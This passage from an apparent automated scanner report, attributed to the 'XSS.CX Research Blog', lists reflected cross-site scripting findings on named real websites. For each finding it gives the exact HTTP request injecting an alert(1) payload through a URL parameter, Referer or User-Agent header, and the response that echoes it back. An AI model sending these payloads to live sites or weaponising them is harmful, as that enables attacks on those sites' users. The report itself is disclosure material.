Date: Mon, 28 Feb 2011 12:45:14 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2178
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2178

<style type="text/css">
   @import url("/scripts/css.css");
</style>

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<iframe name="good" class="registration_iframe" src="http://www.accelacomm.com/jlp/f163e"><script>alert(1)</script>0815371cdeb/10/50552781/_from=cso" width="930" height="1000" border="0" frameborder="0" scrolling="no" onload="scrollit();">
...[SNIP]...

3.148. http://zones.computerworld.com/ncircle/registration.php [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zones.computerworld.com
Path:	/ncircle/registration.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4778'%3balert(1)//c8ec899850f was submitted in the src parameter. This input was echoed as e4778';alert(1)//c8ec899850f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:16 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2160
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2160

<style type="text/css">
   @import url("/scripts/css.css");
</style>

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<!-- window.open('http://www.accelacomm.com/jlp/csoznee4778';alert(1)//c8ec899850f/10/50552781>
...[SNIP]...

3.149. http://zones.computerworld.com/ncircle/registration.php [tab parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://zones.computerworld.com
Path:	/ncircle/registration.php

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ce37"><script>alert(1)</script>810f4ffdf43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso&src=csozne&tab=18ce37"><script>alert(1)</script>810f4ffdf43&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:18 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2140
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2140

<style type="text/css">
   @import url("/scripts/css.css");
</style>

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<div id="tab18ce37"><script>alert(1)</script>810f4ffdf43" class="topTabs">
...[SNIP]...

3.150. http://www.au2m8.com/v/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.au2m8.com
Path:	/v/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b6a8'-alert(1)-'c4271604a3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v/ HTTP/1.1
Host: www.au2m8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7b6a8'-alert(1)-'c4271604a3d

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NQJKKYS192.168.100.219CKOWU; path=/
Date: Mon, 28 Feb 2011 13:34:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, s-maxage=0
Expires: Mon, 28 Feb 2011 13:34:28 GMT
Last-Modified: Mon, 28 Feb 2011 13:34:28 GMT
Set-Cookie: countryID=us; expires=Tue, 28-Feb-2012 13:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: bpl1298903668=1298900068; expires=Mon, 28-Feb-2011 14:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: videoID=expired; expires=Mon, 28-Feb-2011 14:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: auto=expired; expires=Mon, 28-Feb-2011 14:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: playlist=deleted; expires=Sun, 28-Feb-2010 13:34:27 GMT; path=/; domain=.au2m8.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14850

...<html>
    <head>
    <meat http-equiv="Expires" CONTENT="Mon, 28 Feb 2011 13:34:28 GMT">
    <title>Goviral Network Tutorial</title>
    <style type='text/css'>
    <!
...[SNIP]...
a;
lxz = lala;
}
    if(ns != undefined && ns !='') {
    ln1 = ns;
    } else {
    ln1 = 'www.google.com/search?hl=en&q=7b6a8'-alert(1)-'c4271604a3d';
    }
    if(ln1 != ''){
    ln = escape(ln1);
               }else{
    ln2 = document.referrer;
                if(ln2 != ''){
    ln = escape(ln2);
                }el
...[SNIP]...

3.151. http://www.hidglobal.com/onlineOrderStatusRegistration.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hidglobal.com
Path:	/onlineOrderStatusRegistration.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1cb2'><script>alert(1)</script>741bd7b7642 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d1cb2'><script>alert(1)</script>741bd7b7642

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=eu38ssb9vf2qj3hel60nulp0k0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=d1cb2'><script>alert(1)</script>741bd7b7642'>
...[SNIP]...

3.152. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c192"-alert(1)-"3d22ae840f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5c192"-alert(1)-"3d22ae840f5
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=14MTYJGJHPWJJQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32298



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...

s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="173.193.214.243 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5c192"-alert(1)-"3d22ae840f5";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";

/* Conversion Variables */
s.campaign="";
s.state="";
s.zip=""
...[SNIP]...

3.153. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.liverpoolonlinedegrees.co.uk
Path:	/2x/prequal.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a858"><script>alert(1)</script>e735a89a535 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /2x/prequal.jsp HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9a858"><script>alert(1)</script>e735a89a535

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 28 Feb 2011 13:37:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=siYEKRz3V5qwFBpTWgPeuA**.app2-all2; Path=/
Set-Cookie: CLK=0#1298900231141; Expires=Tue, 26-Feb-2019 13:37:11 GMT; Path=/
Set-Cookie: CLK=0#1298900231141; Expires=Tue, 26-Feb-2019 13:37:11 GMT; Path=/
Content-Length: 33038


<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="A127" Value="http://www.google.com/search?hl=en&q=9a858"><script>alert(1)</script>e735a89a535" Type="hidden" tabIndex="15"/>
...[SNIP]...

3.154. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.outsourcingdotnetdevelopment.com
Path:	/xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec06"><script>alert(1)</script>4bdb5a75468 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t0gi96r9vqochnbavcqftgdhu0; path=/
Connection: close
Content-Type: text/html
Content-Length: 21967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html" title="9ec06"><script>alert(1)</script>4bdb5a75468">
...[SNIP]...

3.155. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.outsourcingdotnetdevelopment.com
Path:	/xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4a666<script>alert(1)</script>6e41ba58dc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4oq202rglfpv6h85aosd9ibn77; path=/
Connection: close
Content-Type: text/html
Content-Length: 22289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</script>6e41ba58dc7">4a666<script>alert(1)</script>6e41ba58dc7</a>
...[SNIP]...

3.156. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.supermedia.com
Path:	/spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab56f"-alert(1)-"a47f4268456 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /spportal/spportalFlow.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ab56f"-alert(1)-"a47f4268456

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Mon, 28 Feb 2011 13:38:57 GMT
Set-Cookie: JSESSIONID=F21319170E3705C9C16EF53C999FFD0A.app9-a2; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Wed, 30-Mar-2011 13:38:57 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Wed, 30-Mar-2011 13:38:57 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>



<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ab56f"-alert(1)-"a47f4268456";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.157. http://www.watchmouse.com/en/ [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.watchmouse.com
Path:	/en/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2618'-alert(1)-'10a136a031f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /en/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2618'-alert(1)-'10a136a031f

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-18f0856b42d659e12899dfc9a1a6ae12"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=e2618'-alert(1)-'10a136a031f::en');
           var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=e2618'-alert(1)-'10a136a031f');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referre
...[SNIP]...

Report generated by XSS.CX Research Blog at Mon Feb 28 09:37:13 CST 2011.